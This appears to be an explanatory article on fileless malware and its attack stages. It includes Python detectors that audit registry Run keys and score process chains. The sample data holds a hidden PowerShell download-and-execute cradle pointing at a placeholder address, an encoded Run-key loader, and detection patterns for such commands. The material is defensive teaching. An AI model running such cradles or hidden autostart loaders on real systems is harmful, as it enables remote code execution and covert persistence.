For most of computing history, malware attacks have involved a malicious file finding its way onto a victim's computer and running there. In the early days, files were shared on floppy or compact disk; today they more often arrive over the internet or on the occasional infected flash drive. Antivirus tools have long worked by identifying a malicious file, ideally before it runs, then quarantining and deleting it. Because a known malicious file carries recognizable markers (a hash, a byte pattern, a packer signature), file-scanning antivirus is effective against malware that has already been catalogued.
However, that protection has limits. Fileless malware, which runs without writing a malicious executable to disk, is increasingly common, and many antivirus tools are not equipped to protect devices or data against it. Here is what all users should know about fileless malware and what they can do to remain secure.
How Does Fileless Malware Work?
Cybercriminals create traditional malware by developing purpose-built programs, delivered as files, to attack systems and users in specific ways. Fileless malware instead abuses native, legitimate programs and features that already exist within a computing system, such as PowerShell, Windows Management Instrumentation (WMI), the registry and Office macros, so the attacker never has to write a new executable to disk. Access to a user's device is still required to launch a fileless attack, and in practice a fileless campaign combines ordinary intrusion techniques with fileless building blocks such as:
Exploit kits, which are tools that identify and use vulnerabilities in particular systems or programs, often to run a script in memory straight from a web page. Unpatched and out-of-date software is more likely to contain vulnerabilities that exploit kits can use.
Registry-resident malware, which stores its payload, typically an encoded script, in Windows registry values rather than in files on disk. A startup entry such as a Run key re-launches the script at logon, so the malware stays persistent while giving file scanners nothing to scan.
Memory-only malware, which resides exclusively in a device's memory, for example as code injected into a legitimate running process. It is harder to detect, and because it disappears on reboot it is usually paired with a separate persistence mechanism such as a registry or scheduled-task entry.
Stolen credentials, which can be obtained through phishing, social engineering and other methods.
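To make the registry-resident case concrete, here is an added example (written for this page, not code from the original article or any product) that parses a constructed `reg export` of a user's Run key, flags startup values that hand control to a script host, and decodes a PowerShell -EncodedCommand payload so an analyst can see what would run at logon. The .reg text, the value names and the encoded payload (a harmless Write-Host) are constructed for the example; on a real host you would feed it the output of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`.

```python
import base64
import re

# Constructed sample, modelled on the output of `reg export` for a user's Run key.
# The encoded payload is a harmless Write-Host, built below so the sample stays
# self-consistent. Nothing here is taken from a real incident.
BENIGN_PAYLOAD = 'Write-Host "constructed benign payload"'
ENCODED = base64.b64encode(BENIGN_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"WindowsUpdateHelper"="powershell.exe -NoP -W Hidden -EncodedCommand __ENC__"
"Sync"="wscript.exe //B //E:jscript C:\\ProgramData\\sync.txt"
'''.replace("__ENC__", ENCODED)

# Script hosts and living-off-the-land binaries that a Run value rarely needs.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}

# Command-line traits that, on a startup entry, point at a script-based loader.
TRAITS = {
    "encoded-command": re.compile(r"-e(?:ncodedcommand|ncoded|nc|n|c)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "script-from-non-script-file": re.compile(r"//E:\w+\s+\S+\.(?:txt|log|dat|tmp)\b", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
}

KEY_RE = re.compile(r"^\[(.+)\]$")
# String values only; hex:/dword: values are skipped for this example.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def unescape(s: str) -> str:
    """Undo .reg escaping: backslash-backslash -> backslash, backslash-quote -> quote."""
    return re.sub(r"\\(.)", r"\1", s)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = TRAITS["encoded-command"].search(cmdline)
    if not m:
        return None
    b64 = m.group(0).split()[-1]
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def first_token_image(cmdline: str) -> str:
    """Lowercased basename of the program a command line launches."""
    s = cmdline.strip()
    if s.startswith('"') and '"' in s[1:]:
        exe = s[1:s.index('"', 1)]
    else:
        exe = s.split()[0] if s else ""
    return exe.replace("\\", "/").rsplit("/", 1)[-1].lower()


def audit_run_keys(reg_text: str):
    """Flag Run/RunOnce string values that launch a script host, decoding payloads."""
    findings, key = [], None
    for line in reg_text.splitlines():
        km = KEY_RE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = VALUE_RE.match(line)
        if not vm or key is None or not re.search(r"\\run(?:once)?$", key, re.I):
            continue
        name, data = unescape(vm.group(1)), unescape(vm.group(2))
        image = first_token_image(data)
        if image not in INTERPRETERS:
            continue
        traits = [t for t, rx in TRAITS.items() if rx.search(data)]
        findings.append({"key": key, "name": name, "image": image, "command": data,
                         "traits": traits, "decoded": decode_encoded_command(data)})
    return findings


if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_REG):
        print(f"{f['name']}: {f['image']} traits={f['traits']}")
        if f["decoded"]:
            print("  decoded payload:", f["decoded"])
```

The point a file scanner misses is visible in the second finding: the only "file" is a registry value, and the script exists as a string in that value and, once launched, in memory. Defenders therefore inventory autostart locations (Run and RunOnce keys, scheduled tasks, WMI event subscriptions, services) rather than relying on file scans alone; the trait regexes here are heuristics and will need tuning against an environment's own admin scripts.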
What Are the Stages of a Fileless Malware Attack?
Because the attack runs through preexisting, legitimate code, a traditional antivirus has no malicious file to match and is far less able to recognize the signs of an attack and intervene before damage is done. Users can and should move to more advanced antivirus options that watch behavior rather than only files, but they should also take the time to learn the stages of a fileless malware attack, so that they can take steps to keep their devices, networks and data safe when and if a fileless attack occurs.
A typical fileless malware attack proceeds as follows:
Stage 1: Access. The attacker gains a foothold on a user's system, for example through a phishing document whose macro launches a script, an exploit kit served from a web page, or a remote login with stolen credentials.
Stage 2: Credentials. The attacker harvests credentials (cached passwords, password hashes, tokens) that allow easier movement to other systems in the environment.
Stage 3: Persistence. The attacker creates a backdoor that lets them return to the environment at will, without repeating the earlier stages; in a fileless attack this is commonly a registry Run entry, a scheduled task or a WMI event subscription that re-launches a script.
Stage 4: Data. Finally, the attacker identifies, gathers and exfiltrates valuable data from the user's system.
Any or all of these stages can be carried out with legitimate programs or native features of the device or system, which is what makes the attack fileless.
Are Any Antivirus Tools Useful Against Fileless Malware?
As mentioned above, more robust antivirus tools can defend against fileless attacks because they have several ways of identifying threats. Simpler antivirus solutions look mainly for indicators of compromise (IOCs): artifacts such as file hashes, IP addresses and domain names that show an attack has already taken place. More capable products also look for indicators of attack (IOAs), signs that an attack is currently in progress. IOAs identify sequences of actions that commonly make up an attack, for instance an Office document spawning a hidden script interpreter that then downloads code from the internet. Unlike file matching, IOAs weigh the intent behind a chain of behaviors, which lets a system protect against a broader range of attack methods, including ones that use no malicious file at all.
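As an added illustration of the IOC-versus-IOA distinction (example code written for this page, not any product's detection logic), the script below runs both kinds of check over a few constructed process-creation events of the sort Sysmon Event ID 1 or an EDR agent records. A blocklist lookup of image names finds nothing, because the tooling involved is Microsoft-signed binaries, while a behavior rule that weighs command-line traits together with process ancestry flags a Word document that spawned a hidden PowerShell download cradle. The event fields, the weights and threshold, the process IDs and the 198.51.100.7 address are all assumptions for the example.

```python
import re

# Constructed process-creation events, not captured from a real system. The
# "malicious" chain is a macro document launching a hidden PowerShell download
# cradle; 198.51.100.7 is a documentation address. The scheduled backup script
# is there to show that a single suspicious flag does not raise an alert.
EVENTS = [
    {"pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'},
    {"pid": 2200, "ppid": 2000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""},
    {"pid": 2900, "ppid": 4, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"pid": 3000, "ppid": 2900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

# An IOC list: names of files already known to be bad (assumed for the example).
# Fileless tooling is signed Microsoft binaries, so nothing here can match it.
KNOWN_BAD_IMAGES = {"mimikatz.exe", "nc.exe", "psexesvc.exe"}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}

# Weighted command-line traits. Any one of them is common in benign admin work;
# the combination, plus the process ancestry, is what signals intent.
TRAITS = [
    ("encoded-command", 2, re.compile(r"-e(?:ncodedcommand|ncoded|nc|n|c)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("hidden-window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no-profile", 1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("download-cradle", 2, re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)),
    ("invoke-expression", 2, re.compile(r"\biex\b|invoke-expression", re.I)),
    ("script-url", 2, re.compile(r"\b(?:javascript|vbscript):|/i:https?://", re.I)),
]
OFFICE_ANCESTOR_WEIGHT = 3   # assumed weight for "spawned by an Office app"
ALERT_THRESHOLD = 5          # assumed threshold; tune against local telemetry


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ioc_matches(events, known_bad):
    """Signature-style check: pids whose image name is on the blocklist."""
    return [e["pid"] for e in events if basename(e["image"]) in known_bad]


def ancestry(events, pid, max_hops=8):
    """Image basenames from the root ancestor down to `pid` (cycle-guarded)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_hops:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def ioa_alerts(events):
    """Behavior-style check: score script hosts by flags plus ancestry."""
    alerts = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        score, reasons = 0, []
        for name, weight, rx in TRAITS:
            if rx.search(e["cmdline"]):
                score += weight
                reasons.append(name)
        chain = ancestry(events, e["pid"])
        if any(p in OFFICE_APPS for p in chain[:-1]):
            score += OFFICE_ANCESTOR_WEIGHT
            reasons.append("office-parent")
        if score >= ALERT_THRESHOLD:
            alerts.append({"pid": e["pid"], "score": score, "chain": chain, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    print("IOC hits:", ioc_matches(EVENTS, KNOWN_BAD_IMAGES))
    for a in ioa_alerts(EVENTS):
        print(f"IOA alert pid={a['pid']} score={a['score']} "
              f"chain={' -> '.join(a['chain'])} reasons={a['reasons']}")
```

The scheduled backup script scores only one point (for -NoProfile) and stays quiet; the Word-spawned PowerShell accumulates hidden window, download cradle, Invoke-Expression and an Office parent, which is the "sequence of actions" an IOA is built to recognize. Real products correlate many more event types (network connections, registry writes, module loads) and apply far more careful tuning, but the shape of the logic is the same.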
Larger organizations with bigger security budgets might invest in managed threat hunting, a data-intensive service that continuously monitors telemetry from the environment, pays attention to the subtlest anomalies and proactively searches for intrusions. The average home user, however, should be able to stay reasonably safe with a more sophisticated antivirus tool.
The advent of fileless malware does not spell the end of traditional malware techniques, but it does mean that users need to update their defenses to make sure they remain protected against this attack strategy into the future.